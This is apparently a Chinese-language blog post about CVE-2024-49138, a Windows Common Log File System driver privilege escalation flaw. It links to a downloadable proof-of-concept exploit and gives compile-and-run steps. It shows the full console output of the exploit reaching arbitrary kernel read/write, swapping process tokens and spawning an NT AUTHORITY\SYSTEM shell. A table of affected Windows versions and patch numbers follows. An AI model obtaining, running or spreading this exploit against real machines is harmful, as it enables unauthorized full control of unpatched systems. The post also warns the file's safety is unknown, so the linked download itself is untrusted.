CVE-2024-49138

CVE-2024-49138简介

Windows 通用日志文件系统驱动程序特权提升漏洞。

CrowdStrike 检测到威胁行为者积极利用该漏洞。

CVE-2024-49138 POC exp下载地址

https://lp.lmboke.com/CVE-2024-49138-POC-master.zip

测试

在Windows 11 23h2上测试成功。

编译并运行

编译 x64 发布版本。

运行并获取系统shell。

PS C:\Users\IEUser\Desktop> whoami
windows11\ieuser
PS C:\Users\IEUser\Desktop> .\CVE-2024-49138-POC.exe
Directory created successfully: C:\temp
Directory created successfully: C:\temp
file opened successfully
AddLogContainer successful
hResource = 0x00007FF7CDB89080
hResource = 0x00007FF7CDB890A0
pResourceData = 0x00007FF7CDB890A0
Resource size: 65536 bytes
Resource written to output.bin successfully.
Kernel Base Address: 0xFFFFF80339800000
Kernel Name: ntoskrnl.exe
NtReadVirtualMemory = 0x00007FFFAF0EFB40
NtWriteVirtualMemory = 0x00007FFFAF0EFAA0
pcclfscontainer = 0x0000000002100000
address_to_write = 0xFFFFC201424CC2B2
Process priority set to REALTIME_PRIORITY_CLASS.
Thread priority set to the highest level: TIME_CRITICAL.
triggering vuln...CreateLogFile failed with error 6601
Process priority set to NORMAL_PRIORITY_CLASS.
Thread priority set to the highest level: THREAD_PRIORITY_NORMAL.
vuln triggered
reading base of ntoskrnl to check we have arbitrary read/write
buf = 0x0000000300905A4D
swapping tokens...
current token address = 0xFFFFC201423EC578
systemtoken = 0xFFFFD401F501C6E9
Overwriting process token..
token swapped. Restoring PreviousMode and spawning system shell...
Microsoft Windows [Version 10.0.22631.2861]
(c) Microsoft Corporation. All rights reserved.

C:\Users\IEUser\Desktop>whoami
nt authority\system

C:\Users\IEUser\Desktop>

视频演示

漏洞影响范围及补丁下载链接

发布日期	受影响的产品	影响	最高严重性	文章	补丁下载	构建编号
2024年12月10日	Windows Server 2008 R2 for x64-based Systems Service Pack 1	提权	严重	5048695	Monthly Rollup	6.1.7601.27467
2024年12月10日	Windows Server 2008 R2 for x64-based Systems Service Pack 1	提权	严重	5048676	Security Only	6.1.7601.27467
2024年12月10日	Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)	提权	严重	5048710	Monthly Rollup	6.0.6003.23016
2024年12月10日	Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)	提权	严重	5048744	Security Only	6.0.6003.23016
2024年12月10日	Windows Server 2008 for x64-based Systems Service Pack 2	提权	严重	5048710	Monthly Rollup	6.0.6003.23016
2024年12月10日	Windows Server 2008 for x64-based Systems Service Pack 2	提权	严重	5048744	Security Only	6.0.6003.23016
2024年12月10日	Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)	提权	严重	5048710	Monthly Rollup	6.0.6003.23016
2024年12月10日	Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)	提权	严重	5048744	Security Only	6.0.6003.23016
2024年12月10日	Windows Server 2008 for 32-bit Systems Service Pack 2	提权	严重	5048710	Monthly Rollup	6.0.6003.23016
2024年12月10日	Windows Server 2008 for 32-bit Systems Service Pack 2	提权	严重	5048744	Security Only	6.0.6003.23016
2024年12月10日	Windows Server 2016 (Server Core installation)	提权	严重	5048671	Security Update	10.0.14393.7606
2024年12月10日	Windows Server 2016	提权	严重	5048671	Security Update	10.0.14393.7606
2024年12月10日	Windows 10 Version 1607 for x64-based Systems	提权	严重	5048671	Security Update	10.0.14393.7606
2024年12月10日	Windows 10 Version 1607 for 32-bit Systems	提权	严重	5048671	Security Update	10.0.14393.7606
2024年12月10日	Windows 10 for x64-based Systems	提权	严重	5048703	Security Update	10.0.10240.20857
2024年12月10日	Windows 10 for 32-bit Systems	提权	严重	5048703	Security Update	10.0.10240.20857
2024年12月10日	Windows Server 2025	提权	严重	5048667	Security Update	10.0.26100.2605
2024年12月10日	Windows Server 2025	提权	严重	5048794	SecurityHotpatchUpdate	10.0.26100.2528
2024年12月10日	Windows 11 Version 24H2 for x64-based Systems	提权	严重	5048667	Security Update	10.0.26100.2605
2024年12月10日	Windows 11 Version 24H2 for x64-based Systems	提权	严重	5048794	SecurityHotpatchUpdate	10.0.26100.2528
2024年12月10日	Windows 11 Version 24H2 for ARM64-based Systems	提权	严重	5048667	Security Update	10.0.26100.2605
2024年12月10日	Windows 11 Version 24H2 for ARM64-based Systems	提权	严重	5048794	SecurityHotpatchUpdate	10.0.26100.2528
2024年12月10日	Windows Server 2022, 23H2 Edition (Server Core installation)	提权	严重	5048653	Security Update	10.0.25398.1308
2024年12月10日	Windows 11 Version 23H2 for x64-based Systems	提权	严重	5048685	Security Update	10.0.22631.4602
2024年12月10日	Windows 11 Version 23H2 for ARM64-based Systems	提权	严重	5048685	Security Update	10.0.22631.4602
2024年12月10日	Windows Server 2025 (Server Core installation)	提权	严重	5048667	Security Update	10.0.26100.2605
2024年12月10日	Windows Server 2025 (Server Core installation)	提权	严重	5048794	SecurityHotpatchUpdate	10.0.26100.2528
2024年12月10日	Windows 10 Version 22H2 for 32-bit Systems	提权	严重	5048652	Security Update	10.0.19045.5247
2024年12月10日	Windows 10 Version 22H2 for ARM64-based Systems	提权	严重	5048652	Security Update	10.0.19045.5247
2024年12月10日	Windows 10 Version 22H2 for x64-based Systems	提权	严重	5048652	Security Update	10.0.19045.5247
2024年12月10日	Windows 11 Version 22H2 for x64-based Systems	提权	严重	5048685	Security Update	10.0.22621.4602
2024年12月10日	Windows 11 Version 22H2 for ARM64-based Systems	提权	严重	5048685	Security Update	10.0.22621.4602
2024年12月10日	Windows 10 Version 21H2 for x64-based Systems	提权	严重	5048652	Security Update	10.0.19044.5247
2024年12月10日	Windows 10 Version 21H2 for ARM64-based Systems	提权	严重	5048652	Security Update	10.0.19044.5247
2024年12月10日	Windows 10 Version 21H2 for 32-bit Systems	提权	严重	5048652	Security Update	10.0.19044.5247
2024年12月10日	Windows Server 2022 (Server Core installation)	提权	严重	5048654	Security Update	10.0.20348.2966
2024年12月10日	Windows Server 2022 (Server Core installation)	提权	严重	5048800	SecurityHotpatchUpdate	10.0.20348.2908
2024年12月10日	Windows Server 2022	提权	严重	5048654	Security Update	10.0.20348.2966
2024年12月10日	Windows Server 2022	提权	严重	5048800	SecurityHotpatchUpdate	10.0.20348.2908
2024年12月10日	Windows Server 2019 (Server Core installation)	提权	严重	5048661	Security Update	10.0.17763.6659
2024年12月10日	Windows Server 2019	提权	严重	5048661	Security Update	10.0.17763.6659
2024年12月10日	Windows 10 Version 1809 for x64-based Systems	提权	严重	5048661	Security Update	10.0.17763.6659
2024年12月10日	Windows 10 Version 1809 for 32-bit Systems	提权	严重	5048661	Security Update	10.0.17763.6659
2024年12月10日	Windows Server 2012 R2 (Server Core installation)	提权	严重	5048735	Monthly Rollup	6.3.9600.22318
2024年12月10日	Windows Server 2012 R2	提权	严重	5048735	Monthly Rollup	6.3.9600.22318
2024年12月10日	Windows Server 2012 (Server Core installation)	提权	严重	5048699	Monthly Rollup	6.2.9200.25222
2024年12月10日	Windows Server 2012	提权	严重	5048699	Monthly Rollup	6.2.9200.25222
2024年12月10日	Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)	提权	严重	5048695	Monthly Rollup	6.1.7601.27467
2024年12月10日	Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)	提权	严重	5048676	Security Only	6.1.7601.27467

注意事项

文件安全性未知，请放虚拟机运行。

免责声明

本文仅用于技术讨论与学习，利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，本平台和发布者不为此承担任何责任。